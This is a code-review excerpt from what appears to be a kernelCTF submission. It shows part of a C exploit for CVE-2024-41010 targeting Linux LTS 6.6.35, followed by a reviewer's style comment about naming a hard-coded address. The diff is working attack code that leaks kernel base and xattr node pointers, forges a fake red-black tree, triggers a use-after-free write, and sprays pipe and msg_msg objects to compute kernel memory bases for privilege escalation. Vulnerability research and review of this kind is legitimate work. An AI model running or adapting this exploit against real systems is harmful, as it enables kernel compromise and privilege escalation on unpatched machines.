pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c

```diff
@@ -0,0 +1,871 @@
+		printf("[-] fail on get xattr node info, cleanup it\n");
+		cleanup();
+		return -1;
+	}
+
+	uint64_t lnode = 0, rnode = 0, attr_name_ptr = 0;
+
+	typedef struct {
+		struct simple_xattr xattr;
+		int fname_idx;
+	} xattr_node_leak;
+
+	xattr_node_leak nodes[0x4000/(0x40/0x8)];
+	int nodes_cnt = 0, nodes_front = 0;
+	for(int i=0; i < 0x4000/(0x40/0x8); i+=0x40/0x8)
+	{
+		if(leaks[0x17 + i] == 0x59 && leaks[0x14 + i] && leaks[0x15 + i] && leaks[0x16 + i] && leaks[0x18 + i])
+		{
+			nodes[nodes_cnt].xattr.rb_node.rb_right = leaks[0x14 + i];
+			nodes[nodes_cnt].xattr.rb_node.rb_left = leaks[0x15 + i];
+			nodes[nodes_cnt].xattr.name = leaks[0x16 + i];
+			nodes[nodes_cnt].fname_idx = leaks[0x18 + i];
+			nodes_cnt++;
+		}
+	}
+
+	printf("[*] total leak cnts: %d\n", nodes_cnt);
+
+	if(nodes_cnt < 5)
+	{
+		printf("[-] fail on get enough xattr node info, cleanup it\n");
+		cleanup();
+		return -1;
+	}
+	if(kbase == 0)
+	{
+		printf("[-] fail on get kbase, cleanup it\n");
+		cleanup();
+		return -1;
+	}
+
+	printf("[+] success, leak xattr and kbase\n");
+
+	cleanup_cg_192();
+
+	passer = 1;
+
+retry_1bit_off:
+	if (!fork())
+		trigger_uaf_write(pip1, pip2, 0);
+
+	generate_fake_rbtree(pip1, pip2, (uint64_t)nodes[nodes_front].fname_idx, 
+									 (uint64_t)nodes[nodes_front].xattr.rb_node.rb_right + 1, 
+									 (uint64_t)nodes[nodes_front].xattr.name, 
+									 (uint64_t)nodes[nodes_front].xattr.rb_node.rb_left, 
+									 (uint64_t)nodes[nodes_front].xattr.rb_node.rb_left - 0x18);
+
+	char file_name[FILENAME_LEN];
+	char value_name[XATTR_VALUE_KMALLOC_CG_8K] = {0, };
+    char attribute_name[XATTR_VALUE_KMALLOC_CG_8K];
+	snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, nodes[nodes_front].fname_idx);
+
+	printf("[*] try to remove fake xattr\n");
+	if(remove_xattr(file_name, "security.attr", false) < 0)
+	{
+		printf("[-] fail on remove_xattr, cleanup it\n");
+		cleanup2(nodes[nodes_front].fname_idx);
+		nodes_front++;
+		passer = 0;
+		goto retry_1bit_off;
+	}
+
+	struct pipeio *pipes[0x1f8];
+	for(int i=0; i<0x1f8; i++)
+	{
+		pipes[i] = create_pipeio();
+		resize_pipe(pipes[i], PIPE_BUFFER_KMALLOC_CG_64);
+	}
+
+	printf("[+] pipe alloc fin\n");
+
+	snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-", 1);
+	remove_xattr_noerror(file_name, attribute_name);
+	
+	for(int i=prefix_spray_cnt + FIRST_SPRAY_SZ; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++)
+	{
+		snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i);
+		snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-", 5);
+		remove_xattr_noerror(file_name, attribute_name);
+	}
+
+	spray_msgmsg_for_overwrite_pipe_buffer(0x300, 0x0, 0x0, 0x0);
+	
+	for(int i=0; i<0x1f8; i++)
+		activate_ops(pipes[i]);
+
+	uint64_t vmemmap_base = (read_msgmsg_for_leak_vmemmap_base(0x300) >> 28) << 28;
+	uint64_t kheap_base = (((((uint64_t)nodes[nodes_front].xattr.rb_node.rb_right - 0x6000000) >> 28) - 0x10) << 28);
+	uint64_t longjump_victim_address = kbase + 0x2c51a40;
```

Comment:
Although it's in the writeup, but please comment here that this is the address of the `saved_rbp` (and other) registers. You can also use `#define` for this address (as it changes per target, rationale for this is [here in our style guide](https://google.github.io/security-research/kernelctf/style_guide#name-andor-comment-numeric-constants:~:text=for%20those%20values%20which%20could%20change%20depending%20on%20the%20target)).